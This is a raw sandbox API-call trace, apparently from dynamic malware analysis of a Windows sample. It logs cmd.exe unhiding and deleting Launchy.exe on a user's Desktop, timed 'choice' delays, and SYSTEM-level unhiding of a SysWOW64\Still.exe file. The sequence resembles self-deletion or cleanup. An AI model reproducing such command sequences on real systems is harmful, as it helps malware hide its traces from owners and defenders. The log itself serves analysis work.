[0264.676] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0264.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0264.677] _wcsnicmp (_String1="COPYCMD", _String2="__COMPA", _MaxCount=0x7) returned 4 [0264.677] GetProcessHeap () returned 0x3360000 [0264.677] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3375660) returned 1 [0264.677] GetProcessHeap () returned 0x3360000 [0264.677] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xa) returned 0x3370d60 [0264.677] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0264.677] _get_osfhandle (_FileHandle=1) returned 0x90 [0264.678] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0264.783] _get_osfhandle (_FileHandle=0) returned 0x8c [0264.783] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0265.006] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\attrib.exe", lpCommandLine="attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x2daef88*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2daefd4 | out: lpCommandLine="attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" ", lpProcessInformation=0x2daefd4*(hProcess=0x250, hThread=0x254, dwProcessId=0x25c, dwThreadId=0xe54)) returned 1 [0265.185] CloseHandle (hObject=0x254) returned 1 [0265.185] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0265.185] GetProcessHeap () returned 0x3360000 [0265.185] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337d0a0) returned 1 [0265.185] GetEnvironmentStringsW () returned 0x337d0a0* [0265.185] GetProcessHeap () returned 0x3360000 [0265.185] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb88) returned 0x3379b28 [0265.185] FreeEnvironmentStringsA (penv="=") returned 1 [0265.186] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0xffffffff) returned 0x0 [0267.113] GetExitCodeProcess (in: hProcess=0x250, lpExitCode=0x2daef6c | out: lpExitCode=0x2daef6c*=0x0) returned 1 [0267.113] CloseHandle (hObject=0x250) returned 1 [0267.113] _vsnwprintf (in: _Buffer=0x2daf054, _BufferCount=0x13, _Format="%08X", _ArgList=0x2daef74 | out: _Buffer="00000000") returned 8 [0267.113] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0267.113] GetProcessHeap () returned 0x3360000 [0267.114] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3379b28) returned 1 [0267.114] GetEnvironmentStringsW () returned 0x337d0a0* [0267.114] GetProcessHeap () returned 0x3360000 [0267.114] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb88) returned 0x3379b28 [0267.114] FreeEnvironmentStringsA (penv="=") returned 1 [0267.114] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0267.114] GetProcessHeap () returned 0x3360000 [0267.114] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3379b28) returned 1 [0267.114] GetEnvironmentStringsW () returned 0x337d0a0* [0267.114] GetProcessHeap () returned 0x3360000 [0267.114] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb88) returned 0x3379b28 [0267.114] FreeEnvironmentStringsA (penv="=") returned 1 [0267.114] GetProcessHeap () returned 0x3360000 [0267.114] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3370d60) returned 1 [0267.114] DeleteProcThreadAttributeList (in: lpAttributeList=0x2daf000 | out: lpAttributeList=0x2daf000) [0267.114] ??_V@YAXPAX@Z () returned 0x1 [0267.114] GetConsoleTitleW (in: lpConsoleTitle=0x2daf560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0267.156] malloc (_Size=0xffce) returned 0x4c12d58 [0267.156] ??_V@YAXPAX@Z () returned 0x2daf2ec [0267.157] malloc (_Size=0xffce) returned 0x4c22d30 [0267.157] ??_V@YAXPAX@Z () returned 0x2daf0a4 [0267.157] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0267.157] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0267.157] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0267.157] ??_V@YAXPAX@Z () returned 0x1 [0267.157] GetProcessHeap () returned 0x3360000 [0267.157] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xa4) returned 0x336d5e0 [0267.157] GetProcessHeap () returned 0x3360000 [0267.157] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x336d5e0, Size=0x56) returned 0x33723c0 [0267.157] GetProcessHeap () returned 0x3360000 [0267.157] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x33723c0) returned 0x56 [0267.157] GetProcessHeap () returned 0x3360000 [0267.157] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x5e) returned 0x337a6b8 [0267.157] malloc (_Size=0xffce) returned 0x4c22d30 [0267.158] ??_V@YAXPAX@Z () returned 0x2daf034 [0267.158] GetProcessHeap () returned 0x3360000 [0267.158] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xa4) returned 0x336d5e0 [0267.158] GetProcessHeap () returned 0x3360000 [0267.158] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x336d5e0, Size=0x56) returned 0x3372600 [0267.158] GetProcessHeap () returned 0x3360000 [0267.158] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x3372600) returned 0x56 [0267.158] GetProcessHeap () returned 0x3360000 [0267.158] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x50) returned 0x337a720 [0267.158] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x4c22d30 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0267.158] malloc (_Size=0xffd2) returned 0x4c32d08 [0267.159] ??_V@YAXPAX@Z () returned 0x2daedec [0267.159] malloc (_Size=0xffd2) returned 0x4c42ce8 [0267.160] ??_V@YAXPAX@Z () returned 0x2dae974 [0267.160] malloc (_Size=0xffd2) returned 0x4c52cc8 [0267.161] ??_V@YAXPAX@Z () returned 0x2dae974 [0267.161] GetProcessHeap () returned 0x3360000 [0267.161] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x38) returned 0x3376e50 [0267.162] malloc (_Size=0xffce) returned 0x4c62ca8 [0267.162] ??_V@YAXPAX@Z () returned 0x2dae30c [0267.163] malloc (_Size=0xffce) returned 0x4c72c80 [0267.163] ??_V@YAXPAX@Z () returned 0x2dae30c [0267.164] malloc (_Size=0xffce) returned 0x4c82c58 [0267.164] ??_V@YAXPAX@Z () returned 0x2dae0bc [0267.165] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x4c82c58 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0267.165] ??_V@YAXPAX@Z () returned 0x1 [0267.165] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2dae34c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x4c62ca8, nFileSystemNameSize=0x7fe7 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2dae34c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0267.166] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0267.166] ??_V@YAXPAX@Z () returned 0x2dae324 [0267.166] ??_V@YAXPAX@Z () returned 0x1 [0267.167] ??_V@YAXPAX@Z () returned 0x1 [0267.168] malloc (_Size=0xffce) returned 0x4c62ca8 [0267.169] ??_V@YAXPAX@Z () returned 0x2dae734 [0267.170] GetProcessHeap () returned 0x3360000 [0267.170] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x2c) returned 0x336fd28 [0267.170] GetProcessHeap () returned 0x3360000 [0267.170] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x258) returned 0x337ab38 [0267.170] _wcsicmp (_String1="Launchy.exe", _String2=".") returned 62 [0267.170] _wcsicmp (_String1="Launchy.exe", _String2="..") returned 62 [0267.170] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\launchy.exe")) returned 0x20 [0267.171] GetProcessHeap () returned 0x3360000 [0267.171] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xffd6) returned 0x339ea58 [0267.171] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x339ea60 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0267.171] SetErrorMode (uMode=0x0) returned 0x0 [0267.171] SetErrorMode (uMode=0x1) returned 0x0 [0267.171] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe", nBufferLength=0x7fe7, lpBuffer=0x4c62ca8, lpFilePart=0x2dae754 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe", lpFilePart=0x2dae754*="Launchy.exe") returned 0x23 [0267.174] SetErrorMode (uMode=0x0) returned 0x1 [0267.175] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0267.175] GetProcessHeap () returned 0x3360000 [0267.175] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x258) returned 0x337ad98 [0267.175] _wcsicmp (_String1="Launchy.exe", _String2=".") returned 62 [0267.175] _wcsicmp (_String1="Launchy.exe", _String2="..") returned 62 [0267.175] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\launchy.exe")) returned 0x20 [0267.175] ??_V@YAXPAX@Z () returned 0x1 [0267.175] GetProcessHeap () returned 0x3360000 [0267.175] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x20) returned 0x336af60 [0267.175] GetProcessHeap () returned 0x3360000 [0267.175] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x38) returned 0x3377210 [0267.175] GetProcessHeap () returned 0x3360000 [0267.176] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x38) returned 0x3376f10 [0267.176] ??_V@YAXPAX@Z () returned 0x1 [0267.177] ??_V@YAXPAX@Z () returned 0x1 [0267.179] malloc (_Size=0xffd2) returned 0x4c42ce8 [0267.181] ??_V@YAXPAX@Z () returned 0x2daeaac [0267.181] GetProcessHeap () returned 0x3360000 [0267.181] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x808) returned 0x337bc88 [0267.181] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Launchy.exe", fInfoLevelId=0x0, lpFindFileData=0x337bc94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x337bc94) returned 0x3377350 [0267.182] malloc (_Size=0xffd2) returned 0x4c52cc8 [0267.182] ??_V@YAXPAX@Z () returned 0x2dae63c [0267.182] malloc (_Size=0xffd2) returned 0x4c62ca8 [0267.183] ??_V@YAXPAX@Z () returned 0x2dae63c [0267.183] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0267.183] NtOpenFile (in: FileHandle=0x2dae664, DesiredAccess=0x10000, ObjectAttributes=0x2dae62c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\FD1HVy\\Desktop\\Launchy.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x2dae654, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x2dae664*=0x254, IoStatusBlock=0x2dae654*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0267.184] RtlReleaseRelativeName () returned 0x2dae644 [0267.184] RtlFreeAnsiString (AnsiString="\\") [0267.184] NtQueryVolumeInformationFile (in: FileHandle=0x254, IoStatusBlock=0x2dae590, FsInformation=0x2dae598, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x2dae590, FsInformation=0x2dae598) returned 0x0 [0267.184] CloseHandle (hObject=0x254) returned 1 [0267.194] ??_V@YAXPAX@Z () returned 0x1 [0267.194] ??_V@YAXPAX@Z () returned 0x1 [0267.196] FindNextFileW (in: hFindFile=0x3377350, lpFindFileData=0x337bc94 | out: lpFindFileData=0x337bc94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910dbf00, ftCreationTime.dwHighDateTime=0x1d63873, ftLastAccessTime.dwLowDateTime=0x910dbf00, ftLastAccessTime.dwHighDateTime=0x1d63873, ftLastWriteTime.dwLowDateTime=0x80f4e000, ftLastWriteTime.dwHighDateTime=0x1d63871, nFileSizeHigh=0x0, nFileSizeLow=0x114190, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launchy.exe", cAlternateFileName="")) returned 0 [0267.196] GetLastError () returned 0x12 [0267.196] FindClose (in: hFindFile=0x3377350 | out: hFindFile=0x3377350) returned 1 [0267.196] ??_V@YAXPAX@Z () returned 0x1 [0267.198] GetProcessHeap () returned 0x3360000 [0267.198] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337bc88) returned 1 [0267.198] GetProcessHeap () returned 0x3360000 [0267.198] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3376f10) returned 1 [0267.199] GetProcessHeap () returned 0x3360000 [0267.199] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x336af60) returned 1 [0267.199] GetProcessHeap () returned 0x3360000 [0267.199] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3377210) returned 1 [0267.199] ??_V@YAXPAX@Z () returned 0x1 [0267.210] GetProcessHeap () returned 0x3360000 [0267.210] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337ad98) returned 1 [0267.210] GetProcessHeap () returned 0x3360000 [0267.210] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x339ea58) returned 1 [0267.211] GetProcessHeap () returned 0x3360000 [0267.211] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337ab38) returned 1 [0267.211] GetProcessHeap () returned 0x3360000 [0267.211] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x336fd28) returned 1 [0267.212] GetProcessHeap () returned 0x3360000 [0267.212] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3376e50) returned 1 [0267.212] GetProcessHeap () returned 0x3360000 [0267.212] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337a720) returned 1 [0267.212] GetProcessHeap () returned 0x3360000 [0267.212] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3372600) returned 1 [0267.212] ??_V@YAXPAX@Z () returned 0x1 [0267.213] ??_V@YAXPAX@Z () returned 0x1 [0267.216] _get_osfhandle (_FileHandle=1) returned 0x90 [0267.216] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0267.255] _get_osfhandle (_FileHandle=1) returned 0x90 [0267.255] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac3890 | out: lpMode=0xac3890) returned 1 [0267.302] _get_osfhandle (_FileHandle=1) returned 0x90 [0267.302] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0267.312] _get_osfhandle (_FileHandle=0) returned 0x8c [0267.312] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3894 | out: lpMode=0xac3894) returned 1 [0267.321] _get_osfhandle (_FileHandle=0) returned 0x8c [0267.321] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0267.327] SetConsoleInputExeNameW () returned 0x1 [0267.327] GetConsoleOutputCP () returned 0x1b5 [0267.398] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0267.398] SetThreadUILanguage (LangId=0x0) returned 0x2e40409 [0267.418] exit (_Code=0) [0267.418] ??_V@YAXPAX@Z () returned 0x1 Process: id = "44" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x32fef000" os_pid = "0x13e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x1064" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 577 os_tid = 0x13ec Thread: id = 579 os_tid = 0x112c Thread: id = 580 os_tid = 0x13bc Process: id = "45" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x104cc000" os_pid = "0x13b8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x13c4" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 582 os_tid = 0x130c Thread: id = 583 os_tid = 0xffc Process: id = "46" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x1d6e5000" os_pid = "0xd28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x13d8" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 584 os_tid = 0x137c Thread: id = 586 os_tid = 0xde0 Process: id = "47" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x2b6e8000" os_pid = "0x1150" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0x1064" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 585 os_tid = 0xd88 Thread: id = 587 os_tid = 0x29c Process: id = "48" image_name = "attrib.exe" filename = "c:\\windows\\syswow64\\attrib.exe" page_root = "0x28906000" os_pid = "0xba4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x13c4" cmd_line = "attrib -h \"C:\\WINDOWS\\SysWOW64\\Still.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 588 os_tid = 0xdcc [0266.077] GetModuleHandleA (lpModuleName=0x0) returned 0x12a0000 [0266.077] __set_app_type (_Type=0x1) [0266.077] __p__fmode () returned 0x776f3c14 [0266.077] __p__commode () returned 0x776f49ec [0266.077] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a3210) returned 0x0 [0266.077] __getmainargs (in: _Argc=0x12a4018, _Argv=0x12a401c, _Env=0x12a4020, _DoWildCard=0, _StartInfo=0x12a402c | out: _Argc=0x12a4018, _Argv=0x12a401c, _Env=0x12a4020) returned 0 [0266.077] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0266.077] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x4) returned 0x677c78 [0266.077] ??0CLASS_DESCRIPTOR@@QAE@XZ () returned 0x677c78 [0266.077] ?Initialize@CLASS_DESCRIPTOR@@QAEEPBD@Z () returned 0x677c01 [0266.077] ??0PROGRAM@@IAE@XZ () returned 0x35f590 [0266.077] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f618 [0266.077] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f648 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f678 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f6a8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f6d8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f708 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f738 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f768 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f798 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f7c8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f7f8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f828 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f858 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f888 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f8b8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f8e8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f918 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f948 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f978 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f9a8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35f9d8 [0266.078] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x35fa08 [0266.078] ??0PATH_ARGUMENT@@QAE@XZ () returned 0x35fa38 [0266.078] ??0FSN_FILTER@@QAE@XZ () returned 0x35fa6c [0266.078] ??0FSN_FILTER@@QAE@XZ () returned 0x35fb0c [0266.078] ??0STREAM_MESSAGE@@QAE@XZ () returned 0x35fbb0 [0266.078] ??0PATH@@QAE@XZ () returned 0x35fc18 [0266.078] ??0DSTRING@@QAE@XZ () returned 0x35fe68 [0266.078] ??0ARGUMENT_LEXEMIZER@@QAE@XZ () returned 0x35eea0 [0266.078] ??0ARRAY@@QAE@XZ () returned 0x35f06c [0266.078] ??0ARRAY@@QAE@XZ () returned 0x35f0b4 [0266.078] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x35efa4 [0266.078] ??0PATH@@QAE@XZ () returned 0x35f328 [0266.078] ??0DSTRING@@QAE@XZ () returned 0x35f084 [0266.079] ??0PATH@@QAE@XZ () returned 0x35f0e0 [0266.079] ??0DSTRING@@QAE@XZ () returned 0x35f054 [0266.079] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x35effc [0266.079] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x35f028 [0266.079] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x35efd0 [0266.079] 